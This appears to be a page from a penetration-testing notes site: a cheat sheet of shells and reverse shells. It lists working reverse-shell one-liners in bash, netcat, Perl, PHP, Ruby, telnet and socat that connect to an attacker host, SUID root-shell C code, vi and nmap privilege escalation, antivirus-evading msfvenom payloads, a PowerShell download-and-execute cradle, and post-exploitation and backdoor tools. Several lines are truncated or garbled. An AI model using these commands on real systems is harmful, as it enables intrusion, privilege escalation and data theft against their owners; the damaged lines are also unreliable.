🐚Shells and Reverse Shells Cheat Sheet

SUID C Shells

  • bin/bash:

int main(void){

setresuid(0, 0, 0);

system("/bin/bash");

}

  • bin/sh:

int main(void){

setresuid(0, 0, 0);

system("/bin/sh");

}

TTY Shell:

  • python -c 'import pty; pty.spawn("/bin/bash")'
  • echo os.system('/bin/bash')
  • /bin/sh –i
  • execute('/bin/sh')

LUA:

  • !sh

    • Privilege Escalation via nmap

  • :!bash

    • Privilege escalation via vi

Fully Interactive TTY:

                                In reverse shell 
python -c 'import pty; pty.spawn("/bin/bash")'
Ctrl-Z
                                In Attacker console
stty -a
stty raw -echo
fg
                                In reverse shell
reset
export SHELL=bash
export TERM=xterm-256color
stty rows <num> columns <cols>

Spawn Ruby Shell:

  • exec "/bin/sh"
  • ruby -rsocket -e'f=TCPSocket.open("ATTACKING-IP",80).to_i;exec sprintf("/bin/sh -i <&%d >&%d

Netcat:

  • nc -e /bin/sh ATTACKING-IP 80
  • /bin/sh | nc ATTACKING-IP 80
  • rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p

Socket (Encrypted Shell):

LogoEncrypted Bind and Reverse Shells with Socat (Linux/Windows)

Bind Shell:


# Victim machine

socat -d -d TCP4-LISTEN:4443 EXEC:/bin/bash // for linux

TCP4-LISTEN:4443 EXEC:'cmd.exe',pipes // for windows

# Attacker machine

socat - TCP4:<Victim IP>:4443

Reverse Shell:

# Attacker Machine

socat -d -d TCP4-LISTEN:4443 STDOUT

# Victim Machine

socat TCP4:<Attacker IP>:4443 EXEC:/bin/bash //Linux

TCP4:<Attacker IP>:4443 EXEC:'cmd.exe',pipes //Windows

Encrypted Bind Shell:

# Genereate Openssl key and certificate

openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 1000 -subj '/CN=www.mydom.com/O=My Company Name LTD./C=US' -out bind.crt
# Covert the key file and certificate file to .pem file

cat bind.key bind.crt L > bind.pem

Share the .pem file to victim machine as this is a bind shell

# Victim Machine

socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:/bin/bash //for windows

socat OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork EXEC:'cmd.exe',pipes //for windows


# Attacker Machine

socat - OPENSSL:<Victim IP>:4443,verify=0

Encrypted Reverse Shell:

# Genereate Openssl key and certificate

openssl req -newkey rsa:2048 -nodes -keyout bind.key -x509 -days 1000 -subj '/CN=www.mydom.com/O=My Company Name LTD./C=US' -out bind.crt
# Covert the key file and certificate file to .pem file

cat bind.key bind.crt L > bind.pem
# Attacker Machine

socat -d -d OPENSSL-LISTEN:4443,cert=bind.pem,verify=0,fork STDOUT


# Victim Machine

socat OPENSSL:192.168.168.1:4443,verify=0 EXEC:/bin/bash // for linux

OPENSSL:192.168.168.1:4443,verify=0 EXEC:'cmd.exe',pipes // for windows

Telnet Reverse Shell:

  • rm -f /tmp/p; mknod /tmp/p p && telnet ATTACKING-IP 80 0/tmp/p
  • telnet ATTACKING-IP 80 | /bin/bash | telnet ATTACKING-IP 443

PHP:

  • php -r '$sock=fsockopen("ATTACKING-IP",80);exec("/bin/sh -i <&3 >&3 2>&3");'

    • (Assumes TCP uses file descriptor 3. If it doesn’t work, try 4,5, or 6)

Bash:

  • exec /bin/bash 0&0 2>&0
  • 0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
  • exec 5<>/dev/tcp/ATTACKING-IP/80 cat <&5 | while read line; do $line 2>&5 >&5; done

# or: while read line 0<&5; do $line 2>&5 >&5; done

  • bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1

Perl:

  • exec "/bin/sh";
  • perl —e 'exec "/bin/sh";'
  • perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'
  • perl -MIO -e '$c=new IO::Socket::INET(PeerAddr,"ATTACKING-IP:80");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;'

    • Windows

  • perl -e 'use Socket;$i="ATTACKING-IP";$p=80;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

    • Windows

Stealthy Shells

#1

In the Attacker Machine

msfvenom -p windows/shell/reverse_tcp -e x86/shikata_ga_nai -i 5 LHOST=<IP addr> LPORT=<port number> -f exe > xcmd.exe
msfvenom -p windows/shell/reverse_tcp -e rc4 -encrypt-key BlueSky LHOST=<IP addr> LPORT=<Port number> -f exe > zcmd.exe

In the Victim Machine

Invoke-WebRequest http://<ip address>/xcmd.exe -UseBasicParsing -Outfile xcmd.exe

Living Off the Land

Windows Tools

  • PowerShell

  • cmd.exe

  • cscript.exe

  • psexec.exe

  • wmic.exe

  • findstr -> for searching the file base

  • bitsadmin -> load content

  • regedit -> store information

Linux Tools

  • netcat, scp, curl, and wget for file transfers

  • grep and find for searching the file base

  • awk, gawk, gdb, and other tools

PowerHub

LogoGitHub - AdrianVollmer/PowerHub: A post exploitation tool based on a web application, focusing on bypassing endpoint protection and application whitelistingGitHub

In the Attacker Machine

python3 powerhub.py <Target IP address>

In the Victim Machine

List-HubModules

Recon Local Groups

Get-LocalGroup | ConvertTo-Json | Out-file groups.json

PushTo-Hub groups.json

Exfiltration In the Attacker Machine

dos2unix groups.json

nano groups.json

PHPSploit

LogoGitHub - nil0x42/phpsploit: Full-featured C2 framework which silently persists on webserver with a single-line PHP backdoorGitHub

Start PHPSploit

./phpsploit --interactive

set target <Target URL>

exploit

Reverse Shell using Nishang (Windows Victim Host)

# Installation
sudo apt install nishang

# Nishang Default Shells Location
/usr/share/windows-binaries/nishnag/shells

# Start a python http server to share the payloads
python3 -m http.server 8080

# Start a netcat listener
nc -nlvp 1234

# Download and execute the script in the victim host
powershell iex (New-Object Net.WebClient).DownloadString('http://10.17.6.228:8080/Invoke-PowerShellTcp.ps1');Invoke-PowerShellTcp -Reverse -IPAddress 10.17.6.2>
PreviousEnumeration CheatsheetNextMeterpreter Cheat Sheet

Last updated